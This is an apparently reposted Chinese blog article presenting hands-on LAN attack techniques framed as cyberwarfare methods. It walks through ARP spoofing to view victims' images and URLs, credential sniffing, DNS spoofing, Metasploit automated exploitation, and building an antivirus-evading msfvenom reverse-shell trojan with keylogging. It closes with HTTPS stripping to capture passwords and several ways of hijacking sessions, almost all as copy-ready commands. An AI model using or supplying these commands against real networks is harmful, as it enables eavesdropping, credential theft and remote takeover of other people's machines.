浅谈渗透在网战中的应用办法

点击程序IT免费订阅,每天收到这样的好信息

据说全球有1%的人关注了公众号codepro,你很幸运!

前言:中美网战打响的那一刹那,中国已经落后很多年。然而,我们一直没有停止学习的脚步,“师夷长技以制夷”——我们一直奋斗在战争的第一线。经过漫长的沉淀,原来你就在身边不远处。

此处省略1000字,看下面的实操。

1

1、获取内网目标机的浏览图片

工具:arpspoof、driftnet

① 开启Kali的数据转发功能:

echo 1 > /proc/sys/net/ipv4/ip_forward

② 对目标机进行Arp欺骗:

arpspoof -i eth0 -t 192.168.0.254 192.168.0.71

③ 打开driftnet进行抓包(实验截图如下)。

2

偷窥内网用户浏览过的网页日志

工具:Ettercap、urlsnarf、driftnet

① 开启数据转发功能:

echo 1 > /proc/sys/net/ipv4/ip_forward

② 打开Ettercap并设置好网卡和攻击目标;

ettercap -G// 启动Ettercap图形界面

③ 打开urlsnarf开始抓取监听到的url并显示;

urlsnarf -i eth0

④ 同时也可以打开driftnet抓取图片。

driftnet -i eth0

3

嗅探内网中的敏感信息

工具:metasploit 的嗅探模块 auxiliary/sniffer/psnuffle

注:

① 实测中得到的数据均是本地机和本机各个虚拟机(桥接)的数据,可能跟虚拟机环境有关,猜想在真实机运行应该可以捕获其它网内机器。

① 后经测试,psnuffle模块应该只是捕获经过本地网卡的数据,需要结合arp欺骗方能达到很好的效果。实测中,我在嗅探时,同时打开了Cain进行arp欺骗,捕获效果非常好。

② 使用ichunqiu和网易登录,并未抓到POST数据包,全是GET的;不过FTP可以成功获取。

4

DNS欺骗

工具:Ettercap

① 编辑etter.dns文件,加入条目,将进行目标网站重定向;

vim /etc/ettercap/etter.dns// 编辑文件

*.xueshen.com A 192.168.0.81// 加入域名定向

② 开启dns欺骗:

ettercap -T -q -P dns_spoof -M arp // //

注:如果报错“Incorrect number of token (///) in TARGET !!”,可将“//”换为“///”即可。

5

Metasploit自动攻击

工具:Metasploit

① 进入msfconsole,连接数据库:

db_connect postgres:toor@127.0.0.1/msf

② 扫描ip段,扫描结果会自动写入数据库:

db_nmap -sS -Pn 192.168.0.1/24

③ 加载db_autopwn插件并执行自动攻击:

load db_autopwn// 加载插件

db_autopwn -t -p -r -e// 根据扫描到的ip的端口情况自动选择模块进行攻击测试

注:实际过程中可能会遇到以下错误。

5.1 kali2.0中msf连接postgres数据库错误

错误描述:

msf> db_status

postgres selected, no connection

解决办法:

service postgres start

msfdb init

执行命令后,重启msf便会自动连接到数据库。

5.2 无法执行db_autopwn错误

错误描述

msf > db_autopwn -t -p -r -e

[-] The db_autopwn command is DEPRECATED

[-] See http://r-7.co/xY65Zr instead

解决办法:

到GitHub上下载该插件,并放到/usr/share/metasploit-framework/plugins目录下即可。

下载地址:

https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb

6

利用msfvenom生成木马

工具:metasploit

① 生成反弹木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.81 LPORT=5555 -f exe -o /tmp/muma.exe

免杀:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ’\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe

② 打开msfconsole进行端口监听:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.0.81

set LPORT 5555

exploit

③ 当目标机运行muma.exe后便可得到Shell。

screenshot// 截屏

keyscan_start>keyscan_dump>keyscan_stop// 键盘记录

7

HTTP&HTTPS账号密码获取

工具:arpspoof、ettercap、sslstrip

① 开启数据转发:

echo 1 > /proc/sys/net/ipv4/ip_forward

② 开启Arp欺骗:

arpspoof -i eth0 -t 192.168.0.78 192.168.0.254

③ 编辑etter.conf文件,启用linux的iptables(如果是HTTPS需要此步骤,HTTP不需要);

vim /etc/ettercap/etter.conf

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

sslstrip -a -f -k// 将HTTPS还原为HTTP

缺点:容易出现证书错误

④ 开始抓包:

ettercap -Tq -i eth0

注:实际测试中,http协议可以正常抓取,但是https协议情况下,所有主流现代浏览器都发出安全警示,并禁止继续访问。

8

会话劫持

方法一

工具:arpspoof、wireshark、ferret、hamster

① 开启数据转发:

echo 1 >/proc/sys/net/ipv4/ip_forward

② 开启arp欺骗:

arpspoof -i eth0 -t 192.168.0.71 192.168.0.254

③ 开启wireshark进行抓包,抓包后需要导出为pcap文件;

④ 使用ferret解析文件,生成hasmter.txt文件:

ferret -r cookie.pcap

⑤ 打开hamster软件,然后将浏览器的代理设置为 127.0.0.1:1234;

⑥ 在浏览器中访问 http://127.0.0.1:1234 ,在页面中点击抓到的网页链接获得会话。

方法二

工具:ferret、hamster

① 开启ferret抓包:

ferret -i eth0

② 开启hamster:

hamster

③ 打开浏览器并设置好代理,然后访问http://127.0.0.1:1234,在页面中选择网卡可实时查看抓取到的会话。

方法三

工具:Cookie Cadger

① 打开软件并设置好网卡,然后开启抓包;

java -jar CookieCadger.jar

② 当局域网内有人上网涉及敏感信息,软件就会抓到数据包并罗列出来,只需点选某个网址,加载网站Cookies(Load Domain Cookies)即可实现会话劫持。

注:

① 实测中点击加载cookies后,软件一直“Loading request into browser,please wait...”,使用浏览器浏览也没有劫持到。

② 虽然是java编写的软件,但是在Win10下没找到网卡,无法使用。

Q

8.1 安装ferret时提示“E: 无法定位软件包 ferret”

解决办法:

① 设置更新源:

vim /etc/apt/sources.list// 打开更新源配置文件

② 更新全部软件包:

apt-get update && apt-get dist-upgrade

③ 安装ferret:

apt-get install ferret-sidejack// 注意软件名是ferret-sidejack不是ferret,ferret是别的软件

注:有可能需要添加对32位的支持dpkg --add-architecture i386

Q

8.2 获取Cookie Cadger

最新版本的Kali已经移除了Cookie Cadger,可使用以下命令获取并安装

请长按下方赞赏给予鼓励

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180516G00P9S00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

同媒体快讯

扫码关注云+社区

领取腾讯云代金券